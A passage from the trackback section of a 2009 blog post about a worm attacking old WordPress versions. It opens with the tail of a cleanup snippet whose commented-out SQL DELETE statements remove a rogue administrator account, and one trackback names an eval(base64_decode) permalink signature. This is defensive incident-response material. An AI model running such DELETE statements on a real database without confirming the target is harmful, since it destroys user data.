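-- DELETE FROM wp_usermeta WHERE user_id = 123;   -- 123 = the confirmed rogue ID
-- DELETE FROM wp_users    WHERE ID = 123;
```

Run these in phpMyAdmin or the mysql client. The first three queries only read; the two DELETE statements stay commented out until the ID has been confirmed against query 2 and the database has been backed up, and they do nothing about files the attack may have changed, which is why the post above insists on a clean upgrade rather than a database edit alone.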

  85. [...] but true: it appears that my little blog fell victim to an attack on Wednesday at 2:16 in the morning. It began with the registration of a user named “MikeWink”. After that [...]

  87. [...] you never entered, you have been attacked. For further information you can consult Lorelle’s continuously updated page. Tag: [...]

  89. [...] Source:Old WordPress Versions Under Attack « Lorelle on WordPress [...]

  91. [...] The source news can be read in English at TechCrunch; a blog article linked there says that all versions older than 2.8.3 are vulnerable to the [...]

  92. [...] do so. Hasan bhai’s blog, mashable.com (English), lorelle.wordpress.com [...]

  93. [...] Old WordPress Versions Under Attack Protect your WordPress blog now: UPDATE NOW!!! Update your WordPress blog before you continue reading this post. That’s how critical this issue is. [...]

  95. [...] Right now there is a large-scale campaign on Twitter to upgrade WordPress today, due to Lorelle’s article Old WordPress Versions Under Attack [...]

  97. [...] other sites that have been talking about the WordPress attack. And the most comprehensive one is on Lorelle.  I recommend that you take note of the post.  Incase you don’t read it , I will post a [...]

  98. [...] This warning from Lorelle shows how critical the issue is. [...]

  99. [...] a blog entry by Lorelle, there is currently a large wave of attacks on WordPress blogs. So let it be said: only the [...]

  100. [...] are coming out from Mashable and Lorelle on WordPress about a hack attack on all websites using WordPress as their blogging application. Everyone has [...]

  103. [...] upgraded the site to the latest version of WordPress in response to reports of a serious attack on older versions (if you’re running any version earlier than the new 2.8.4, go read about it [...]

  104. [...] reported on it: http://www.barbaraling.com/insights/…iant-headline/ as did Lorelle. Old WordPress Versions Under Attack Lorelle on WordPress __________________ SEO Makes The World Go 'Round [...]

  105. [...] to Lorelle on WordPress, a site dedicated to all things WordPress, it has been discovered that hackers have discovered a [...]

  106. [...] a few hours ago I discovered that one of my major blogs — http://howtoplaza.com — was hacked (read about the latest hacker attacks on WordPress blogs). I did some research and most of the solutions I found were quite vague, and the WordPress website [...]

  107. [...] VanFossen / Lorelle on WordPress: Old WordPress Versions Under Attack  —  Otto42 of OttoDestruct, a key WordPress developer and supporter, reports that [...]

  108. [...] or the lack of involvement on the part of administrators, and this afternoon I witnessed almost desperate announcements in which those in a position to act were begged to perform the update URGENTLY [...]

  109. [...] are latest reports that WordPress blogs using old versions are under attack and are under security risk. It is [...]

  111. [...] Anyway, this time they also put some malicious code on my archive pages. Google sent me an email saying they had removed my blog from its index. That got a whole team to look into how they broke in. Now thanks to TechCrunch and Mashable you know there was a vulnerability in WordPress which let them break in. Even more good details on Lorelle’s blog. [...]

  114. [...] vulnerability was discovered yesterday, and the number of sites that have been attacked is continuing to grow. The security of your site [...]

  116. [...] source of the news comes from Lorelle on WordPress. It has then been reported by tech blogs such as TechCrunch and Mashable!  Just thought it’s [...]

  118. [...] Attacks against all but latest WordPress. So if you haven’t upgraded do so. With the latest versions of WP upgrading is ridiculously easy as well. [...]

  119. [...] many. In fact, I even took the time to comment on Lorelle’s blog regarding her post entitled, “Old WordPress Versions Under Attack” hoping that somehow I could contribute to the [...]

  120. [...] All versions other than the very latest are apparently susceptible. I have to wonder when WordPress users will start switching to some other platform.  ?  [From Large Scale Attack Against WordPress Installations Underway] [...]

  121. [...] Lorelle announced on her blog that older WordPress versions were getting hacked. [...]

  123. [...] that you should know about this attack are following as per lorelle: 1. Reports are that this attack impacts ALL versions of WordPress up to 2.8.4, the most recent [...]

  124. [...] To see whether or not you have been affected, and what to do if you have been attacked, read here. [...]

  125. [...] The warning came from the WordPress developer community itself and is being spread by one of the most respected blogs on the subject, Lorelle on WordPress. [...]

  126. Upgrade your WordPress sites NOW!…

    Older versions of WordPress are being attacked!  You should upgrade to the latest version immediately.  The newest version is not susceptible to the type of attacks that are occurring.   Read about the attacks and what you should do if you’ve alr…

  127. [...] Lorelle VanFossen wrote on her blog: [...]

  128. [...] to the latest version (2.8.4) are vulnerable to a serious, active security threat.  Respected WordPress blogger Lorelle, explains that there are two clues you should look for, to see if your WordPress blog has already [...]

  129. [...] Old WordPress Versions Under Attack « Lorelle on WordPress a few seconds ago from web [...]

  130. [...] Original source : http://lorelle.wordpress.com/2009/09/04/old-wordpr… [...]

  132. [...] As Lorelle reports today, a growing number of attacks on WordPress blogs have been reported. It is urgently [...]

  133. [...] blogsphere and social media sites, and also confirmed by Otto42, a key WordPress developer and Lorelle has confirmed that old versions are under attack and the number of sites hit by this is growing [...]

  135. [...] WordPress goddess issued dire warnings today, about hacks in the offing which forced me to do a rather hasty upgrade of my installation to the [...]

  140. [...] comes from Lorelle on WordPress, which [...]

  141. [...] This critical warning comes from Lorelle on WordPress. [...]

  142. [...] Old WordPress Versions Under Attack « Lorelle on WordPress. [...]

  143. [...] to Lorelle on WordPress: Otto42 of OttoDestruct, a key WordPress developer and supporter, reports that there is an [...]

  144. [...] is a particularly nasty WordPress attack making the rounds right now which Lorelle talks about on her blog. If you are not running the latest version of WordPress (2.8.4), you should upgrade [...]

  146. [...] The threat was reported on Lorelle’s blog (itself based on WordPress) after it turned out that hackers are exploiting security holes found in older versions of the software. The method is very simple. A new administrator account is created, which gives access to the database. Worse, the number of attacks is growing hour by hour. [...]

  148. [...] as well as a community of enthusiasts. It’s thanks to that community, led by a wonderful Lorelle VanFossen in this case, that we even know about the current [...]

  149. [...] seems that old versions of wordpress are under attack.  If you have a self-hosted version of wordpress (ie, your blog is not on the wordpress.com [...]

  150. [...] right down to the database level. These attacks are said to be “growing by the hour”. Lorelle (who first discovered it) writes: There are two clues that your WordPress site has been [...]

  151. [...] Lorelle explains, a new attack seems to be making the rounds amongst older versions of WordPress and wreaking havoc [...]

  152. [...] Shared Old WordPress Versions Under Attack « Lorelle on WordPress. [...]

  153. [...] Lorelle details the problem very well on her blog (in English). [...]

  154. [...] are here (and also on WordPress’s [...]

  155. [...] Old WordPress Versions Under Attack | Lorelle on WordPress 〈Old versions of WordPress are under attack〉 [...]

  156. [...] … read this. [...]

  158. [...] this blog by Lorelle on how to secure your blog and what to do if it has already been attacked. Check out the Follow-Up [...]

  159. [...] like there's a pretty glaring hole in all but the most recent version of WordPress. A brief inspection of this site reveals that I'm way behind current and was broken in to. A fresh [...]

  160. [...] may have already heard that sites running out-of-date versions of WordPress have been under attack (Lorelle, Weblog Tools Collection, WordPress Dev Blog). Of course, sites running the latest version of the [...]

  161. [...] FanStress on wordpress.com 6 September 2009, 01:02 Filed under: Announcements, WordPress At the end of December the multi-domain hosting where the blog lived would have expired, and there was already the idea of moving lock, stock and barrel to WP.com, but I decided to bring that forward, given my by now scant desire to deal with the technical maintenance of the site and hence a likely lapse in keeping WordPress updated, not a very wise thing given recent events. [...]

  162. [...] the security of our blog, except in special cases. In this case, however, as Lorelle On WordPress explains, because of a new vulnerability all WordPress users who are not running the latest [...]

  163. [...] http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/ [...]

  165. [...] this weekend, a major exploit attack has been taking place on old versions of self-hosted blogging platform WordPress. If you are using [...]

  166. [...] Old WordPress versions – apart from 2.8.4 – under risk of attack: Otto42 of OttoDestruct, a key WordPress developer and supporter, reports that there is an “attack” on older versions of WordPress right now. The number of sites hit by this is growing every hour. Protect your WordPress blog now: UPDATE NOW!!! [...]

  167. [...] the time of writing, an attack on WordPress is in progress. Unfortunately a security chink in older versions of the blogging application has been located and [...]

  168. [...] more information on this attack and how to protect new and already hacked blogs can be found at Lorelle’s blog. A must-read for every WordPress user running a version older than [...]

  170. [...] There are many reports that a worm targeting old versions of WordPress, the most widely used blog engine in the world, is spreading. [...]

  172. [...] some reports that there is an “attack” on older versions of WordPress right now. According to a study [...]

  173. [...] Original Post by Lorelle [...]

  174. [...] vulnerable – and being hit – by a worm that affects any old (ie before 2.8.4) version.Details are here (and also on WordPress's site). As Matt Mullenweg, who has played a key part in the development [...]

  175. [...] enumerates some symptoms to know if your site has been affected by the worm: There are two clues that your WordPress site [...]

  177. [...] More at Lorelle: [...]

  178. [...] is excellent. I’m sending it to my editors tonight- these are some of the big… Recent LinksOld WordPress Versions Under AttackLorelle on WordPress | September 4, 2009Daniel Bachhuber says: Using an exploit that has been [...]

  179. [...] Old WordPress Versions Under Attack (tags: wordpress-security howto tips wordpress security hacks php cms advice alert) Follow RCC Graphic Designs on Twitter. This entry was posted on Saturday, September 5th, 2009 at 11:04 pm and is filed under Articles. [...]

  180. [...] 06th, 2009 | Author: mel I just read a bulletin that claims that WordPress blogs are under attack. So I upgraded again, even though I had been putting it off for weeks. Everything seems to be okay [...]

  181. [...] Old WordPress Versions Under Attack [...]

  183. [...] Apparently WordPress is under attack. As a result I was forced to upgrade despite my weeks of delaying. Here’s the story. [...]

  185. [...] Also, in case you’re still questioning the status of your blog, make sure to read the FAQ on the subject at http://codex.wordpress.org/FAQ_My_site_was_hacked, look out for odd behavior on your blog, and look for changes/mods in links as in the example given in Lorelle’s Blog Post [...]

  186. [...] appeared on the blog “Lorelle”, where the bug was discovered that allows previous versions of WordPress to create [...]

  188. [...] running older versions of the popular blogging software WordPress are reporting that their sites are being compromised by hackers. WordPress founder Matt Mullenweg has confirmed that older versions can be compromised [...]

  189. [...] This was first reported on Lorelle on WordPress. [...]

  191. [...] The upgrade is simple, even from such an old version. If you run your own version of WordPress make sure you’re current. Here’s why: http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/ [...]

  192. [...] there have been reports that older versions of WordPress self-hosted blogs are under attack by an online creature named [...]

  196. [...] the problem yesterday on Lorelle On WordPress and today, indirectly, by Matt on the official blog; this vulnerability finds its only [...]

  197. [...] more information: http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/ There are no comments yet on this [...]

  199. [...] nobody was sure, until one of the giants of the WordPress world, lorelle, wrote a post about it. Now you have only one way forward [...]

  200. [...] Cause: a virus; for details see this link. [...]

  201. [...] WordPress have prepared detailed instructions for effective prevention and cure. Personally, besides regular updating, I also recommend the following [...]

  202. [...] Old WordPress Versions Under Attack « Lorelle on WordPress Otto42 of OttoDestruct, a key WordPress developer and supporter, reports that there is an “attack” on older versions of WordPress right now. The number of sites hit by this is growing every hour. Protect your WordPress blog now: UPDATE NOW!!! [...]

  203. [...] a nasty worm that’s going around attacking all older versions of WordPress. Ominous security advisories [...]

  206. [...] that your blog has already been “infected” are, according to lorelle, changes in the WP permalink structure [...]

  207. [...] http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/ <– oh, look, wordpress is getting p0wned en-masse. again. [...]

  208. [...] How do you know you have been attacked?  Here is the explanation from Lorelle’s WordPress blog: [...]

  211. [...] info and further details, I refer you to the official news on Lorelle and, in Italian, on [...]

  213. [...] been a big fuss lately over the latest WordPress hacks that have targeted older versions of [...]

  214. [...] updating it. The warning came from Lorelle on WordPress after they discovered that security holes had been breached [...]

  215. [...] so: oh my god. i just manually upgraded two wordpress installations in under 15 minutes. (if you run wordpress and haven’t already upgraded to 2.8.4, you need to do it now!) [...]

  217. [...] of Sunday #1 6 September 2009, 14:59 Filed under: General, WordPress – Old WordPress Versions Under Attack – How to Keep WordPress Secure – Update, update, and then don't say we didn't tell you – [...]

  218. [...] Old WordPress Versions Under Attack [...]

  219. [...] nobody was sure until one of the giants of the WordPress world, lorelle, wrote a post about it. Now you have only one option [...]

  220. [...] is one of the signs that lets you tell whether you have been attacked (further details in this post by Lorelle [...]

  221. [...] hearing of numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest [...]

  222. [...] are here (and also on WordPress’s [...]

  223. [...] Old WordPress versions under attack Here’s a pretty detailed post about the vulnerability and how to detect it, fix it and keep yourself safe. [...]

  224. [...] hosted on my servers, you are up to date. Why? Because I make sure of it. For the rest of you, do your part, so I don’t have to. Because my part will be making your blog secure, but it will also be sending you a sizable [...]

  225. [...] http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/ [...]

  226. [...] lorelle – old wordpress version under attack [...]

  227. [...] (See the Rest of the Story at Old WordPress Versions Under Attack.) [...]

  228. [...] warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  229. [...] more details at Lorelle’s blog: Old Versions of WordPress Under Attack. There’s also detailed instructions on how to recover if you’ve been attacked and [...]

  230. [...] 2.0 News We’re hearing of numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest [...]

  231. [...] Read at Lorelle on WordPress [...]

  232. [...] are two clues that your WordPress site has been [...]

  233. [...] strongly recommended. Luckily I haven’t been hit by the attack that’s been going [...]

  234. [...] hearing of numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest [...]

  235. [...] the talk is of a security hole in WordPress that has landed a blogger in trouble with hackers [...]

  236. [...] problem we mentioned above is being widely discussed in posts like How to Keep WordPress Secure and Old WordPress Versions Under Attack. Although our customers have been protected against this particular new attack since August 12, as [...]

  237. [...] Old WordPress Versions Under Attack [...]

  238. [...] me to explain. Yesterday I got this rather frightening warning to upgrade asap to the next version (2.8.4) of WordPress (that’s the system upon which this [...]

  239. [...] your WordPress! More details about the attacks More information on the WordPress blog WordPress blogs under attack from hack attack (where I saw the [...]

  240. [...] worm has been spreading that breaks sites running out of date versions of WordPress by attacking a vulnerability fixed nearly a month ago. If you have a web site, you have a [...]

  241. [...] info: Old WordPress Versions Under Attack WordPress Permalink & Rss problems How to Keep WordPress Secure This entry was written by [...]

  242. WordPress Under Attack : Users Advised to Upgrade Immediately …

    Important security warning for all WordPress users: if you are using WordPress, a very popular blog publishing application, then you are advised to upgrade immediately to the latest version, 2.8.4……

  243. [...] Mashable, Lorelle A second clue is an administrator-type user named “Administrator (2)” or [...]

  244. [...] of all the customization I did on this blog but the other day there was news of a really nasty exploit that targeted all WordPress installations before the current one and I got my ass in [...]

  245. [...] Old Versions of WordPress Under Attack [...]

  246. [...] a small thing has changed. Because of the current security threat to older WordPress installations (meaning all except the current version 2.8.4 [...]

  247. [...] the source of this report, there are some steps to carry out to clean up and restore a blog [...]

  248. [...] A summary of the situation and the existing solutions by Lorelle [...]

  249. [...] do you know if your site has been affected? Lorelle on WordPress offers two possible ways to find [...]

  250. [...] We are hearing numerous reports that older versions of WordPress have serious security vulnerabilities. WordPress is one of the largest blog engines. The latest version, 2.8, has already been downloaded 5,317,360 times. Many large blogs, including us at TechCrunch, use WordPress as their blogging platform. [...]

  251. [...] do you know if your site has been affected? Lorelle on WordPress offers two possible ways to find [...]

  252. [...] the announcement WordPress warns readers to upgrade immediately before reading their complete post it is that serious. Consider this comment from the official [...]

  253. [...] access the guts of your blog, databases and all. How do you know if your site has been affected? Lorelle on WordPress offers two possible ways to find [...]

  254. [...] is to export the database and reinstall WordPress using the latest version. (via) [...]

  255. [...] access the guts of your blog, databases and all. How do you know if your site has been affected? Lorelle on WordPress offers two possible ways to find [...]

  256. [...] about how things will go on with WordPress in future. In the meantime a worm is even circulating which, although it affects only older WordPress versions – it is nevertheless already [...]

  257. [...] to Lorelle, there are two ways that you can know if your WordPress has been [...]

  258. [...] hearing of numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest [...]

  259. [...] like a nasty WordPress bug/worm is on the rampage. Please update your WordPress blogs! I’ve updated this one, and my other [...]

  260. [...] all the wrong things like giving their users a 14-step process for upgrade, the following Jewel came up: 4. WordPress is Not Secure: WordPress is incredibly secure and monitored constantly by experts in [...]

  261. [...] warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  262. [...] to Lorelle, there are two ways that you can know if your WordPress has been [...]

  263. [...] checking on my WP Dashboard, I came across Lorelle’s post that warned WordPress users about old WordPress versions being attacked. From that post, I learned that there are reports of attacks on older versions of WordPress and [...]

  264. [...] Lorelle: Old WordPress Versions Under Attack [...]

  265. [...] A summary of the situation and the existing solutions by Lorelle [...]

  266. [...] of WordPress. I found out about the problem through Lorelle’s twitter account where she linked to an article on her blog covering the details of the attack. Mark Ghosh of WeblogToolsCollection.com quickly [...]

  267. [...] Old WordPress Versions Under Attack (Lorelle VanFossen) [...]

  268. [...] Attack 7Sep2009 Filed under: Crisis, Virus and other problems Author: admin There are numerous reports that older versions of WordPress are exposed to security threats. You probably know that WordPress [...]

  269. [...] are here (and also on WordPress’s [...]

  270. [...] appeared on the “Lorelle” blog, where the bug was discovered that allows earlier versions of WordPress to create a [...]

  271. [...] yesterday Lorelle's blog entry was pointed out, saying that there is currently a large wave of attacks on WordPress blogs on which [...]

  272. [...] long story short:  UPDATE YOUR WORDPRESS RIGHT NOW. There is a major WordPress hack going around targeting older versions of WordPress.  The latest version is unaffected so if you [...]

  273. [...] bring up to date. Whether your own blog has already been infected can, according to Lorelle, be determined as follows [...]

  274. [...] on that is available here or also here. You can subscribe to this blog's posts via RSS feed or leave a trackback on your [...]

  275. [...] I cannot judge, but anyone who wants to find out whether their own blog is affected will find further information at Lorelle. Matt has also taken up the topic and once again urgently reminds [...]

  276. [...] Sources: WP-Support, Lorelle on WordPress [...]

  277. [...] site Lorelle raised the alarm about the vulnerability of the software of [...]

  278. [...] Lorelle [...]

  279. [...] There’s a major attack going around that targets older versions of WordPress. Lorelle has the full details. There are two clues that your WordPress site has been [...]

  280. [...] Old WordPress Versions Under Attack by Lorelle [...]

  281. [...] thorough review of how important it is to update to the new version can be found on the blog Lorelle on WordPress. It also shows how you can tell whether your blog is [...]

  282. [...] how you can check if you’re already being attacked: There are two clues that your WordPress site has been [...]

  283. [...] written by tapirul September 7, 2009 @ 5:00 am other stuff The blogosphere is, it seems, Under Attack. NOT only by mister alex leo serban, but by other stuff. What amuses me the most is [...]

  284. Two Ideas for Mitigating Future WordPress Vulnerabilities…

    This weekend there has been a plethora of news stories about pre-2.8.4 versions of WordPress being hacked (Lorelle, Matt or the Guardian). The official way to protect yourself is to install an upgraded version of the system.
    My first suggestion: The ad…

  285. [...] And here is also a blog post by Matt Mullenweg on better securing WordPress systems: How to Keep WordPress Secure. There are also good links from Mashable and from good old Lorelle at WordPress.com. [...]

  286. [...] do you know if your site has been affected? Lorelle on WordPress offers two possible ways to find [...]

  287. [...] Foreign news sources have already issued a warning to upgrade WordPress to the latest version quickly (luckily I upgraded several days earlier), for anyone still using a version below 2.8.4, because a skilled hacker can break into the system and create an Admin-level user. Don't be complacent, friends; serious problems may follow, such as spam content creating junk content and junk comments that are nothing but links, or in unreadable language [...]

  288. [...] Lorelle recommends: 1. UPDATE NOW! Reports are that this attack impacts ALL versions of WordPress up to 2.8.4, the most recent release. [...]

  289. [...] For me it is a given to always run the latest version; this is as important as having the latest updates for your antivirus program, your firewall, and last but not least, for Windows. I also try to stay up to date on all the plugins I use. More reading about the hacker attack at WP-Support Sverige and at Lorelle on WordPress. [...]

  290. [...] anyone wants to read more about the problems this worm causes, you can read either this blog here, or Matt Mullenweg's own blog at [...]

  291. [...] to use it. While it doesn’t remove responsibility completely, to WordPress’ credit, this most recent issue took hold only on outdated versions of WordPress. If you have been keeping your WordPress [...]

  292. [...] the problem yesterday on Lorelle On WordPress and today indirectly from Matt on the official blog, this vulnerability finds its only [...]

  293. [...] weekend the wires suddenly ran hot: a security hole in practically all widespread WordPress installations supposedly made an immediate update to the latest version urgently necessary. Not a big deal, really. Unfortunately [...]

  294. [...] Lorelle has more details and suggestions on how to clean up your blog if it was hacked. [...]

  295. [...] Old WordPress Versions Under Attack [...]

  296. [...] of WordPress A new type of attack against blogs running on WordPress has been discovered, according to Lorelle VanFossen. It affects blogs running outdated versions of WordPress (earlier than 2.8.4), and the number [...]

  297. [...] not strictly necessary add-ons. The discussion about a light version, also or especially because of security concerns, is in full swing. A stable and secure core version, slimmed down and flexibly extensible [...]

  298. [...] is one of the signs that lets you tell whether you have been attacked (further details in this post by Lorelle VanFossen). [...]

  299. [...] more information about the current attacks and a list of WordPress security resources you can visit Lorelle on WordPress. [...]

  300. [...] that I have your attention….  Go to Lorelle’s site, Robert Scoble’s site and the WordPress Dev Blog to see details of this new [...]

  301. [...] I should drop this to the members here. I am sure most of us are running some form of wordpress: Old WordPress Versions Under Attack Lorelle on WordPress Upgrade if possible. I did last night on our production blogs. Jaysunn [...]

  302. [...] are two strange things as reported by Lorelle on WordPress that you should look for to see whether your blog is affected or not [...]

  303. [...] I also read a great article about this at Lorelle on WordPress. [...]

  304. [...] are here (and also on WordPress’s site). As Matt Mullenweg, who has played a key part in the [...]

  305. [...] are here (and also on WordPress’s site). As Matt Mullenweg, who has played a key part in the [...]

  306. Incident: Compromise of Jean-Luc Mélenchon's blog…

    Let us be clear about the situation from the outset. This incident does not specifically target Jean-Luc Mélenchon, president of the Parti de Gauche (PG). Mass attacks systematically strike content management systems (CMS) that are vulnerable to…

  307. [...] recent alert went out about a worm invading WordPress blogs that aren’t updated.  This alert is real and [...]

  308. [...] do you know if your site has been affected? Lorelle on WordPress offers two possible ways to find [...]

  309. [...] WordPress in the past year. But there’s nothing as motivating as getting forwarded a link containing, Otto42 of OttoDestruct, a key WordPress developer and supporter, reports that there is [...]

  310. [...] warning comes from Lorelle on WordPress after it was discovered that a nasty attack is exploiting security holes in previous versions of [...]

  311. [...] Lorelle on WordPress offers two ways to find out: [...]

  312. [...] resources about the attacks already out there. “Lorelle on WordPress” has an extensive post about symptoms and remediation. From her post: How Do I Know If My Site Has Already Been [...]

  313. [...] a blog entry by Lorelle, there is currently a large wave of attacks on WordPress blogs. So let it be said: only the most current [...]

  314. WordPress is under attack!…

    The blogging tool WordPress, which is the most popular standalone blogging tool on the market today, is under attack by malicious hackers. They go after older versions of WordPress and, by exploiting security holes, they alter links and add new admin…

  315. [...] are here (and also on WordPress’s [...]

  316. [...] now that is growing by the hour. WordPress Attack Underway: WordPress Users Must Upgrade [ALERT] Old WordPress Versions Under Attack Lorelle on WordPress WordPress › Blog How to Keep WordPress Secure WordPress › Blog WordPress 2.8.4: [...]

  317. [...] This new exploit seems to create a ‘fake’ administrator (which you cannot see) within WordPress which may change URLs or abuse other parts of your site. Please see the following links for reference: WordPress 2.8.4 Security Release Mashable – WordPress Attack Underway Lorelle on WordPress [...]

  318. [...] the information from WordPress on how to keep your site safe, and read Lorelle’s post to find out if you have been [...]

  319. [...] Lorelle has pointed out two ways to test if you’ve been attacked: [...]

  320. [...] Jeff Johnson, The Detroit Toilet And WordPress Vulnerability I’m guessing a huge proportion of WordPress users were hit by the recent wordpress problem, you can find out more about it here: Old WordPress Versions Under Attack. [...]

  321. [...] WordPress Blogs Get Attacked Last week a good chunk of WordPress blogs were finding that they were getting attacked from hackers. Those who had not been keeping up with the latest WordPress updates were vulnerable to the attack, and as a result a hacker could create an administrator account on the affected site. If you’re running the latest 2.8.4 release, however, you have nothing to worry about. [...]

  322. [...] As reported on the blog of Lorelle, a “blog evangelist” who is an expert in, among other things, WordPress, all versions before 2.8.4 are subject to a security bug that allows a hidden administrator to be created and thus opens your blog to any kind of activity: http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/ [...]

  323. [...] as of this writing) to avoid an exploit which may place your blog or web site at risk. See the article at "Lorelle on WordPress" for more info. Either use the upgrade link on your WordPress blog's control panel, or download and [...]

  324. [...] high profile WordPress blogs that were not updated. John Gruber over at Daring Fireball has jumped into the fray with some posts on the subject including this new one titled “How Not to Get Your Blog [...]

  325. [...] Lorelle [...]

  326. [...] hearing of numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest [...]

  327. [...] Warning! Old versions of WordPress are easily hijacked; update immediately (the original article for this post is here → Old WordPress Versions Under Attack) [...]

  328. [...] Old WordPress Versions Under Attack « Lorelle on WordPress (tags: wordpress security) [...]

  329. [...] Details at this link. [...]

  330. [...] Old WordPress Versions Under Attack [...]

  331. [...] As reported on the blog of Lorelle, a “blog evangelist” who is an expert in, among other things, WordPress, all versions before 2.8.4 are subject to a security bug that allows a hidden administrator to be created and thus opens your blog to any kind of activity: http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/ [...]

  332. [...] are some ways you can find out if your blog has been hacked, mentioned by Lorelle: There are strange additions to the pretty permalinks, such as [...]

  333. [...] do you know if your blog has been hacked? Lorelle On WordPress says: There are strange additions to the pretty permalinks, such as [...]

  334. [...] you use self-hosted WordPress for your blog and you’re not using the latest version, 2.8.4, you’re running a severe risk of your site security being compromised and even [...]

  335. [...] If you use WordPress for blogging, you should make absolutely sure you’ve upgraded to the late… [...]

  336. [...] not going to repeat the already excellent advice that people like Lorelle on WordPress have offered. If you have a WordPress blog yourself, you should also read Matt Mullenweg’s tips on securing [...]

  337. [...] Old WordPress Versions Under Attack: Older version of WordPress are being attacked and characters are being added to the permalinks. Sure signs of the attack include strange characters in your permalinks (single posts do not work) and an extra administrator account in the users control panel which you cannot see. Look for the administrator count in brackets at the top. Is the number there what you would expect on your blog? [...]

  339. [...] in what the attack was led me to do a little investigation. For what I read, go to these blogs: http://lorelle.wordpress.com/2009/09/04/old-wordpress-versions-under-attack/ and [...]

  340. [...] I heard the news about the latest WordPress exploit in Lorelle’s alarmingly titled “Old WordPress Versions Under Attack” post. I especially appreciated the warning, “Update your WordPress blog [...]

  341. [...] Old WordPress Versions Under Attack [...]

  342. [...] given by WordPress developer Otto42 last Friday, September 4, and it has been widely publicized. The reach of the attack is large and it hits all versions up to 2.8.2, so follow the advice [...]

  343. [...] hearing of numerous reports that older versions of WordPress are exposed to security threats. WordPress is one of the largest [...]

  344. [...] Old WordPress Versions Under Attack « Lorelle on WordPress UPGRADE! sorry. didn't mean to yell. But cleaning your corrupted install sucks a nut. (tags: wordpress-security secure alert hacker hackers lorelle wp-security) [...]

  345. [...] Attack WordPress – Old Version Hi all, Stumbled on this update: Old WordPress Versions Under Attack Lorelle on WordPress from this guy: Vita Vee's Affiliate Profits Club I'm subscribed to his mailing list… hope it [...]

  346. [...] do you know if your site has been affected? Lorelle on WordPress offers two possible ways to find [...]

  347. [...] Old WordPress Versions Under Attack [...]

  348. [...] reading on this hack and WordPress security issues: Lorelle – Old WordPress Versions Under Attack WordPress Spam Hack Alert WordPress forum thread – eval(base64_decode(…)) in permalinks [...]

  349. [...] WordPress Blog, like this one, then you need to be aware of a new attack.   Take  a look at Lorelle on WordPress for details.  If you haven’t upgraded to WordPress 2.8.4 then your blog is vulnerable to [...]

  350. [...] is a very good post by Lorelle on her blog titled “Old WordPress Versions Under Attack” – it is well worth the read and there are plenty of references that will enable a follow [...]

  351. [...] The main reason to upgrade was to fix the security hole in the wordpress versions before 2.8.4. The warnings were spread over the internet that it is a serious attack.  According to some analysis the threat [...]

  352. [...] can tell by two methods whether your own site has been infected. For one, the URLs are changed and contain [...]

  353. [...] is a particularly nasty WordPress attack making the rounds right now which Lorelle talks about on her blog. If you are not running the latest version of WordPress (2.8.4), you should upgrade immediately. If [...]

  355. [...] weekend the big story was about a widespread hacker attack against WordPress blogs. If you read CN, you know that my sites have been exploited so many times, [...]

  356. [...] development blog posted a response encouraging users to keep their blogs upgraded. Lorelle has posted some information about the attacks that are going on against WordPress sites. In short: upgrade, just do [...]

  357. [...] repeat what he had already told me – update to the NEWEST version of WordPress, because it is precisely the older versions that have been hit in this raid. And yes, my Finishfirst.dk is also updated now!!! The ironic thing is that I had decided that it [...]

  358. [...] one blog that mentions this security problem is Lorelle in her article Old WordPress Versions Under Attack, and she recommends upgrading to version 2.8.4 immediately, before even reading her article, because it is so dangerous [...]

  359. [...] was a little kersnaffle with WordPress last weekend – Lorelle describes it well there – and I always trust the very cool Lorelle – that there were some [...]

  360. [...] – Old WordPress Versions Under Attack – How to Keep WordPress Secure [...]

  361. [...] upgrading, may allow a remote attacker to get in. I recommend further reading in this post, “Old WordPress versions under attack” by Lorelle. Leave a [...]

  362. [...] “worm” is concerned, there are various ways to check for it. The first clue should be to look at the WordPress permalinks. If they have strange code at the end, then [...]

  363. [...] social media savvy, DjangoCon, AT&T infrastructure woes, Seth the blogger guy, Foursquare, and WordPress attacks and WordPress real-time RSS with RSS [...]

  364. [...] More information about the worm, what to do, and how to clean up the intrusion, at Lorelle On WordPress: Old WordPress Versions Under Attack [...]

  365. [...] morning, the answer finally came to me in an email – a WordPress security exploit.  Months of suspicions proved true and I was left to carefully analyze the server database for [...]

  366. [...] I am home sick today. I am catching up on my television and decided to upgrade WordPress due to a security issue that cropped up last week. If you haven’t heard, Lorelle on WordPress gives a good overview of it: There are two clues that your WordPress site has been attacked. There are strange additions to the p… [...]

  367. [...] new type of attack against blogs running on WordPress has been discovered, according to Lorelle VanFossen. It affects blogs running outdated versions of WordPress (earlier than 2.8.4), and the number [...]

  368. [...] in mind that if your WordPress installation already has the worm, upgrading will not fix it (How to tell if your installation has been hacked). Restoring a website that has been attacked by a worm is much more difficult than preventing the [...]

  369. [...] these three sources (JinnatulHasan, TechCrunch and Lorelle) I noticed that wordpress blogs are under attack. As wordpress is the largest blogging engine [...]

  370. [...] resources about the attacks already out there. “Lorelle on WordPress” has an extensive post about symptoms and remediation. From her post: How Do I Know If My Site Has Already Been [...]

  371. [...] are some ways you can find out if your blog has been hacked, mentioned by Lorelle: There are strange additions to the pretty permalinks, such as [...]

  372. [...] Old WordPress Versions Under Attack [...]

  373. [...] Lorelle on WordPress] [...]

  374. [...] light of the recent security problem, I will follow his advice. So, as of today, all my plugins will only be tested on the latest stable [...]

  375. [...] then I heard about how old wordpress versions were under attack, and resolved to tear down all three main blogs here (Daily Flash Fiction and LifeLacking being the [...]

  376. [...] thing, the webmaster getting past the filters). You can find the full news by clicking HERE. Anyway, don't worry: I am almost obsessive about updating the blog: I hope that [...]

